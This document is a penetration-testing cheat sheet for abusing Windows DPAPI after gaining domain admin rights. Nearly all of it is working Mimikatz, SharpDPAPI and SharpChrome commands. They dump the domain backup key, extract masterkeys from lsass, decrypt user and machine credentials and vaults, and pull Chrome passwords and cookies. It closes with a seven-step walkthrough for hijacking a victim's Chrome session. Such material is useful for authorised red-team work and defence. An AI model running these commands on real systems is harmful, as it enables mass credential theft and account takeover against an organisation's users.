DPAPI
In a domain admin post-exploitation scenario, dump the domain backup key first and then decrypt all that you need by adding the option /pvk:key.pvk with SharpDPAPI.
Retrieve domain backup keyâ
With DA rights and the DPAPI domain backup key, it is possible to decrypt any domain user masterkey.
lsadump::backupkeys /system:<DC> /export
By default, it uses the current DC and the output is in B64
SharpDPAPI.exe backupkey [/server:SERVER.domain] [/file:key.pvk]
DPAPI blob decryptionâ
mimikatz dpapi::blob /in:c:\\..\\<blob_file> /masterkey:<masterkey>
Rerieve GUIDâ
dir /a C:\Users\<username>\AppData\Roaming\Microsoft\Credentials
dir /a C:\Users\<username>\AppData\Local\Microsoft\Credentials
Extract masterkeyâ
Retrieve SHA1 representation of the Masterkeyâ
Useful when a masterkey is needed for a specific GUID. Once the SHA1 is dumped from lsass, Mimikatz can use it via the option /materkey::<SHA1>.
privilege::debug
!sekurlsa::dpapi
!dpapi::cache
Decrypt offline user's masterkeyâ
Keys location
C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<user-SID>\<KEY_GUIDs>
dpapi::masterkey /in:<MASTERKEY_LOCATON> /sid:<USER_SID> /password:<USER_PLAINTEXT> /protected
Extract user machine credentials and vaultsâ
SharpDPAPI.exe machinetriage
Decrypt machine masterkeyâ
dpapi::masterkey /in:C:\Windows\System32\Microsoft\Protect\S-1-5-18\<GUID> /system:DPAPI_SYSTEM
SharpDPAPI.exe machinemasterkeys
Decrypt machine vaultâ
SharpDPAPI.exe machinevaults
Extract user credentials, vault and rdgâ
SharpDPAPI.exe triage
SharpDPAPIâ
Extract credentials
SharpDPAPI.exe credentials [{GUID1}:SHA1 {GUID2}:SHA1 ...]
Also can work remotely
SharpDPAPI credentials /pvk:<BASE64_backup_key> [server:<server.fqdn_domain>]
Extract vaults
SharpDPAPI.exe vaults [{GUID1}:SHA1 {GUID2}:SHA1 ...]
Also can work remotely
SharpDPAPI.exe vaults /pvk:<BASE64_backup_key> [server:<server.fqdn_domain>]
Mimikatzâ
Step 1 Masterkey dump - You do not know the user's password
dpapi::masterkey /in:"C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<user_SID>\<cred_file>" /rpc
Step 1 Masterkey dump - You know the user's password
dpapi::masterkey /in:"C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<user_SID>\<cred_file>" /sid:<user_sid> /password:<password> /protected
Step 2 - Data decryption
dpapi::cred /in:C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\<ID> /masterkey:<masterkey>
Google Chromeâ
SharpChromeâ
SharpChrome.exe <logins | cookies> /pvk:<key.pvk | BASE64> /format:table [/showall] [/server:<target>]
Mimikatzâ
If the user's context cannot be taken see other scenarios:
dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\UserData\Default\Login Data"
dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\UserData\Default\Login Data" /unprotect
dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\UserData\Default\Cookies" /unprotect
Stealing Domain Users' sessionsâ
Step 1 - Download the whole Chrome folder
C:\Users\<victim>\AppData\Local\Google\Chrome\User Data\
Step 2 - Download all the cred files in this folder
C:\users\<victim>\appdata\Roaming\Microsoft\Protect\<victim_SID>
Step 3 - On your local machine in your mimikatz folder copy the masterkey
xcopy /H <victim_SID>\<cred_file>
Step 4 - Decrypt the user's keys from Mimikatz
dpapi::masterkey /in:<cred_file> /pvk:<domain_backup_key.pvk>
Step 5 - Put the victim's key in memory on your local machine
The password is the password of your local user, not the victim's password. The szGuid is the name of the <cred_file>
dpapi::create /guid:{<szGuid>} /key:<private_key> /password:<local user's password> /protected
If you get the error: "kuhl_m_dpapi_create ; kull_m_file_writeData (0x00000005)" delete or move the original masterkey file
del /a <cred_file>
Step 6 - Copy the file on your local machine
xcopy /H <Mimikatz_folder>\<cred_file> C:\Users\<local_user>\AppData\Roaming\Microsoft\Protect\<local user's SID>\
Step 7 - Open Google Chrome and enjoy!